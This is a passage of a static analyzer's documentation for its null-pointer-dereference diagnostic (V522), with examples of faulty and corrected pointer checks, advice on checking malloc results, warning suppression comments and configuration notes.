if (!pointer && pointer->x()) { ... }

In all the conditions, there is a logical error that leads to dereferencing of the null pointer. The error may be introduced into the code during code refactoring or through a misprint.

Correct versions:

if (pointer == 0 || pointer->m_a) { ... }
if (pointer != 0 && pointer->x()) { ... }
if (array != 0 && array[3]) { ... }
if (pointer && pointer->x()) { ... }

These are simple cases, of course. In practice, operations of pointer check and pointer use may be located in different places. If the analyzer generates the V522 warning, study the code above and try to understand why the pointer might be a null pointer.
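
The correct versions work because && and || short-circuit: the right operand is evaluated only when the left one has not already decided the result. A small sketch, with a hypothetical Node type and function names chosen only for illustration:

```cpp
// Hypothetical type used only for this illustration.
struct Node {
    int m_a;
};

// Safe: && evaluates its right operand only when the left one is true,
// so node->m_a is read only for a non-null node.
bool has_nonzero_field(const Node* node) {
    return node != nullptr && node->m_a != 0;
}

// Safe: || evaluates its right operand only when the left one is false,
// so node->m_a is read only when node is not null.
bool is_null_or_nonzero(const Node* node) {
    return node == nullptr || node->m_a != 0;
}
```

Swapping the comparison in either function (== for != or the reverse) would make the right operand run exactly when the pointer is null, which is the pattern the diagnostic reports.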

Here is a code sample where the pointer check and the pointer use are on different lines:

if (ptag == NULL) {
  SysPrintf("SPR1 Tag BUSERR\n");
  psHu32(DMAC_STAT)|= 1<<15;
  spr1->chcr = ( spr1->chcr & 0xFFFF ) |
               ( (*ptag) & 0xFFFF0000 );   
  return;
}

The analyzer will warn you about the danger in the «( (*ptag) & 0xFFFF0000 )» line. Either the condition is written incorrectly or a different variable should be used instead of ‘ptag’.
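
What the original authors intended is not known, so the following is only one possible reading: the error branch reports the problem and returns without touching the pointer, and the dereference happens on the non-null path. The function merge_tag_bits and its parameters are hypothetical stand-ins, not the project's actual code:

```cpp
#include <cstdint>

// Hypothetical stand-in for the register update in the fragment above.
// Returns false and leaves *chcr untouched when either pointer is null;
// otherwise keeps the low 16 bits of *chcr and takes the high 16 from *tag.
bool merge_tag_bits(std::uint32_t* chcr, const std::uint32_t* tag) {
    if (chcr == nullptr || tag == nullptr) {
        return false;  // error path: leave without dereferencing
    }
    *chcr = (*chcr & 0xFFFFu) | (*tag & 0xFFFF0000u);
    return true;
}
```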

Sometimes programmers deliberately dereference a null pointer for testing purposes. For example, the analyzer will produce the warning wherever this macro is used:

/// This generate a coredump when we need a
/// method to be compiled but not usabled.
#define elxFIXME { char * p=0; *p=0; }

Extraneous warnings can be turned off by adding the «//-V522» comment to the lines that contain the ‘elxFIXME’ macro. Alternatively, you can write a comment of a special kind beside the macro:

//-V:elxFIXME:522

The comment can be written either before or after the macro; the position does not matter. To learn more about methods of suppressing false positives, see the analyzer documentation.

malloc, realloc

Programmers often do not check the pointer returned by ‘malloc’ or similar functions before using it. This omission often results in a warning. Some programmers believe that checking the pointer is unnecessary: if memory allocation fails, the program is no longer functional anyway, so a crash caused by the null pointer is an acceptable outcome.

However, everything is much more complicated and dangerous than it may seem at first glance. We suggest reading the article: «Why it is important to check what the malloc function returned».
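
For reference, a checked allocation can look like the sketch below. The helper duplicate_text is hypothetical; it reports allocation failure to the caller by returning a null pointer instead of writing through one:

```cpp
#include <cstddef>
#include <cstdlib>
#include <cstring>

// Hypothetical helper: returns a heap copy of `text`, or nullptr when the
// input is null or the allocation fails. The caller releases it with free().
char* duplicate_text(const char* text) {
    if (text == nullptr) {
        return nullptr;
    }
    const std::size_t size = std::strlen(text) + 1;  // include the terminator
    char* copy = static_cast<char*>(std::malloc(size));
    if (copy == nullptr) {
        return nullptr;  // allocation failed: report it, do not write through null
    }
    std::memcpy(copy, text, size);
    return copy;
}
```

The caller still has to test the result before using it; the check inside the helper only moves the decision about how to handle the failure to a place where it can be made deliberately.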

If you still do not plan to check such pointers, keep reading to find out about the specialized analyzer configuration.

Additional Settings

This diagnostic relies on information about whether a particular pointer could be null. In some cases, this information is retrieved from the table of annotated functions, which is stored inside the analyzer itself.

‘malloc’ is one such function. Since it can return ‘NULL’, using the pointer it returns without a prior check may result in a null pointer dereference.

Sometimes our users wish to change the analyzer’s behavior and make it assume that ‘malloc’ cannot return ‘NULL’. For example, they may use system libraries in which ‘out of memory’ errors are handled in a specific way.

They may also want to tell the analyzer that a certain function can return a null pointer.

In that case, you can use the additional settings, described in the section «How to tell the analyzer that a function can or cannot return nullptr».

This diagnostic is classified as:

  • CWE-476
  • CWE-690
  • CERT-EXP34-C
  • CERT-MEM52-CPP
